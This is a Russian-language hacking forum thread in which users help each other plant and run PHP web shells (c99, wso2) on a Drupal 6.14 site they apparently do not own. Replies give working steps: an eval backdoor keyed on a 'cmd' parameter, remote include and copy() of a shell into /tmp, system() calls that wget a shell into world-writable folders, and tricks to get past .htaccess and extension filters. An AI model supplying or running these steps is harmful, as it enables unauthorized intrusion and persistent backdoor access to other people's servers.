Drupal: получилось испольнить php-код шелла, но проблема. ПОМОГИТЕ!
 

Получилось таким способом исполнить шел: http://forum.antichat.ru/showpost.php?p=1756391&postcount=6

Всё загрузил, но у меня не открывается шелл, а просто предлагается скачать файл php. Пробываал разные браузеры. Не знаю как быть.

Потом воспользовался другим способом. Создал тему, сделал её phpшной.

Вписал в тему сначала <?php include 'http://www.site.ru/files/c99.php3' ?>

Потом целиком код шелла. При первой загрузке такой странице шелл отображается, но когда пытаюсь сделать какое либо действие, меня кидает уже на обычную страницу с ошибками:

warning: Invalid argument supplied for foreach() in /var/www/htdocs/www.site.ru/includes/common.inc(1343) : eval()'d code(2) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 184.


Подскажите как быть. Провозился целый день. Шелы залиты на сервак, но не срабатывают а лиш скачиваются. Да и через тему не получается.

Пожскажите, может быть возможно исполнить какой-либо php-код который загрузить шелл в нужную мне папку. Я посмотрел. У них они там все почти пригодны для этого.

Очень жду ответа.

Значит не дурачки админы, тот способ проверялся на Win-платформе, скорее всего правильно расставленные(настроенные) .htaccess

Попробуй вместо "<?php include 'http://www.site.ru/files/c99.php3' ?>" сделай "if (isset($_REQUEST[cmd])) eval(stripslashes($_REQUEST[cmd]));" и посмотри все папки доступные на запись + их содержимое, учитывая .htaccess-ы сверху и внутри и их содержимое, т.е. нужно искать папку, доступную на запись и где нет ограничений на исполнение файлов. Если только корень - значит лить в корень

PS: Уверен что версия 6.14? Такой способ заливки

http://forum.antichat.ru/showpost.php?p=1756391&postcount=6

канает только на ней

еще раз проверил - по умолчанию никаких ограничений в этой ветке нет на исполнение .php3 из http://site.ru/sites/default/files/wso2.php3, файл исполняется, не скачивается

Вот на эту строку if (isset($_REQUEST[cmd])) eval(stripslashes($_REQUEST[cmd])); сайт никак не реагирует. В папки которые можно залить шелл я и так вижу, так как один раз шелл срабатывает и я вижу корень с папками и их правами. В корень залить точно можно.

Подскажите код скрипта который можно было бы выполнить, чтобы он закачал файл в корень. Очень жду совета. Надо довести дело до конца)))

Pashkela, спасибо что откликнулся ;)

в этом двиге .htaccess в некоторых директорях обрубает php скрипты, то есть если ты даже залил, то код тупо не будет исполняется. Помойму папка случаем не files называется?

Как это никак не реагирует? Ты же сказал, что php-скрипты в теме исполняются. Создай тему, туда пихни этот код, а потом вызови скрипт с параметром ?cmd=phpinfo();, например.

именно так.

а как же быть тогда? должен же быть выход... например если в статье исполнить какой-нить скрипт который загрузит шелл в другую папку или в корень например. или так нельзя?

Вот с параметром сработало :) Я просто в пхп не силён, поэтому туплю.

PHP Info показалось. Что дальше? Как мне это поможет? Вы уж простите если совсем тупые вопросы...

И так не получается. Прав не хватает. Не загружается шел в папки /etc/, /tmp/ (((((((

да в тмп накосячил чуть

с чего ты решил что не грузит в папку /tmp/?

Я не смотрел этот друпал,и не пробывал залить шелл.
Но если там можно добавлять произвольные расширения,то попробуй добавить htaccess, и залить файл со своими правами на исполнение скриптов.Ну это так,раздумья.
А еще попробуй залить шелл с расширением phtml :) может поможет.

Потому что вот такой скрипт <?php curl('http://www.site.ru/files/wso2.txt','/etc/shell.php'); ?>

не выполняется. пишется готово и белая страница. и инклуд <?php include '/etc/shell.php' ?> не происходит

как же быть?

грю накосячил, в /tmp/ лей а не /етс/

а не так ли в итоге?

Зачем заново создавать код в странице, ты один раз написал вон тот, который дал тебе пашкела, так его и не меняй , просто вставляй вместо пхпинфо();

copy('http://www.site.ru/files/wso2.txt','/tmp/1.php');
а затем include('/tmp/1.php');

// сорр курсач просто висит не curl а copy

Вот что выдаёт когда делаю команду copy

copy(http://www.site.ru/files/wso2.txt) [function.copy]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/www.site.ru/includes/common.inc(1343) : eval()'d code(1) : eval()'d code on line 1.

Перед тем как использовать copy или include(файла со стороннего сервера), убедись в том что директивы allow_url_fopen или allow_url_include, соответственно, стоят в on.

если safe_mode=off, то можно с system попробовать,
=system('wget site.com/shell.txt -O /tmp/1.php'); , или альтернативными качалками , ну и потом инклудить, как было написано выше.

?cmd=system('which wget');
если вывел, но смотрим дальше.
?cmd=system('ls -la'); - ещем, где права 777 /*Iceangel_: проще воспользоваться командой 'find /www -type d -perm 0777'*/
?cmd=system('cd папка/где/права/777; wget http://shell.com/shell.txt -O shell.php');

PROFIT!!!

Я апну тему...
Таже трабла, что и у ТСа, тоже версия 6.14 (по changelog'у пасмарел) заливается шелл но .php3 не выполняется, .pl меняется на pl_
.htaccess меняется на htaccess.
.php3.7z меняется на .php3_.7z

А дальше вы про темы говорите, но я немогу найти вобще как там темы заливать :confused:
Гугл вобще говорит темы надо копировать в папку на сервере, так былбы у меня доступ к папке каконить, нафик мне надо былобы это :o

тоже самое

Ну АП кагбы...

скорей всего архивировать папку надо потом заливать на сервер

так нет кнопки "загрузить" или ещё чего... Тама сразу выбор шаблонов и написано чоб были и другие - загрузите на сервер

Та же проблема!
Никак не могу ее решить...

Давайте думать вместе!